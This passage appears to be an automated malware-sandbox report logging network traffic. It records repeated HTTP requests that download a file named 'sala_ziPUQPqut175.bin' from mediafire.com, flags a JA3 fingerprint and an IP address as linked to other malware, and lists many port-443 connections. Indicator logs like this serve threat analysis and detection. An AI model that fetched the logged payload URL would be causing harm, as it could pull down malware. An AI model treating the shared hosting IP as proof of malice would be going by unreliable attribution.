Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.53.48 104.16.53.48
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
